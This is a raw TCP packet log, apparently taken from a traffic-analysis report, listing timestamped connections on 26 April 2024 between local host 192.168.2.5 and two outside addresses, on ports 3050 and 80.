                                              Apr 26, 2024 07:40:58.999494076 CEST497153050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:41:00.156681061 CEST497153050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:41:00.434417963 CEST30504971545.88.90.110192.168.2.5
                                              Apr 26, 2024 07:41:12.722676992 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:12.956356049 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:12.956651926 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:12.957057953 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.190501928 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.191859961 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.191914082 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.191960096 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.191998005 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.192032099 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.192080021 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.192111015 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.192152977 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.192164898 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.192212105 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.192236900 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.192265987 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.192279100 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.192306042 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.192318916 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.192357063 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.192398071 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.192446947 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.192462921 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.192507029 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.425635099 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.425771952 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.425863028 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.425936937 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.426024914 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.426096916 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.426120996 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.426254988 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.426280975 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.426306009 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.426321030 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.426369905 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.426373005 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.426410913 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.426435947 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.426497936 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.426501036 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.426564932 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.426572084 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.426632881 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.426635981 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.426700115 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.426703930 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.426754951 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.426772118 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.426826954 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.426860094 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.426923037 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.427021027 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.427084923 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.427108049 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.427174091 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.427185059 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.427247047 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.427248955 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.427292109 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.427310944 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.427365065 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.427438021 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.427506924 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.659321070 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.659373999 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.659455061 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.659461021 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.659521103 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.659527063 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.659580946 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.659801960 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.659825087 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.659852982 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.659879923 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.660945892 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.660978079 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.661010981 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.661022902 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.661493063 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.661545992 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.661546946 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.661602974 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.661673069 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.661720037 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.661721945 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.661765099 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.661775112 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.661887884 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.661938906 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.661956072 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.662003994 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.662509918 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.662556887 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.662563086 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.662611008 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.662704945 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.662754059 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.662772894 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.662800074 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.662836075 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.662862062 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.662862062 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.662905931 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.662914991 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.662929058 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.662959099 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.662983894 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.663003922 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.663064957 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.663089037 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.663136005 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.663175106 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.663202047 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.663232088 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.663254976 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.663258076 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.663297892 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.663299084 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.663358927 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.663383961 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.663439989 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.663463116 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.663511992 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.663537025 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.663589001 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.663614035 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.663669109 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.663728952 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.663789034 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.663795948 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.663841963 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.663849115 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.663894892 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.663919926 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.663969040 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.663980007 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.664009094 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.664032936 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.664052963 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.664083958 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.664122105 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.664138079 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.664169073 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.896346092 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.896367073 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.896378040 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.896392107 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.896457911 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.896470070 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.896481991 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.896496058 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.896533012 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.896605015 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.896673918 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.896744967 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.896749020 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.896761894 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.896775961 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.896862030 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.897876978 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.897893906 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.897965908 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.898017883 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.898062944 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.898066044 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.898130894 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.898458004 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.898472071 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.898507118 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.898542881 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.898644924 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.898658037 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.898672104 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.898685932 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.898688078 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.898700953 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.898711920 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.898756027 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.898787022 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.898829937 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.898969889 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.898983955 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.899018049 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.899039030 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.899149895 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.899163008 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.899195910 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.899214029 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.899641037 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.899655104 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.899667025 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.899681091 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.899691105 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.899693966 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.899708033 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.899717093 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.899722099 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.899735928 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.899749041 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.899756908 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.899761915 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.899801016 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.902884007 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.902899027 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.902913094 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.902925014 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.902949095 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.902975082 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.903059006 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.903073072 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.903085947 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.903110027 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.903151989 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.903516054 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.903531075 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.903563023 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.903603077 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.903702974 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.903717041 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.903731108 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.903757095 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.903770924 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.903887987 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.903902054 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.903915882 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.903933048 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.903940916 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.903948069 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.903970003 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.904006004 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904009104 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.904021025 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904035091 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904048920 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904058933 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.904062986 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904073000 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.904109001 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.904154062 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904197931 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.904356956 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904370070 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904383898 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904397011 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904403925 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.904428959 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.904470921 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.904521942 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904536963 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904551983 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904573917 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.904587984 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.904664993 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904679060 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904690981 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904705048 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904716969 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.904726028 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904738903 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904747009 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.904787064 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.904804945 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904819965 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.904851913 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.904889107 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.904997110 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.905009985 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.905023098 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.905038118 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.905044079 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.905054092 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:13.905076981 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:13.905093908 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.132783890 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.132844925 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.132900953 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.132945061 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.132976055 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.133037090 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.133063078 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.133126020 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.133133888 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.133183002 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.133219004 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.133239985 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.133255005 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.133301020 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.133307934 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.133368969 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.133642912 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.133713961 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.133714914 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.133766890 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.133795977 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.133810997 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.133837938 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.133858919 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.133915901 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.133919954 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.133992910 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.134021044 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.134093046 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.134107113 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.134162903 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.134171009 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.134231091 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.134238958 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.134310007 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.134408951 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.134454012 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.134479046 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.134516001 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.134537935 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.134574890 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.134594917 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.134639978 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.134649992 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.134685993 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.134706020 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.134738922 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.134763956 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.134814978 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.134884119 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.134962082 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.134984970 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.135060072 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.135101080 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.135153055 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.135174036 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.135238886 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.135456085 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.135533094 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.135545015 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.135607004 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.135792017 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.135864019 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.135901928 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.135967970 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.136039019 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.136118889 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.136152029 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.136235952 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.136276960 CEST804972287.121.105.163192.168.2.5
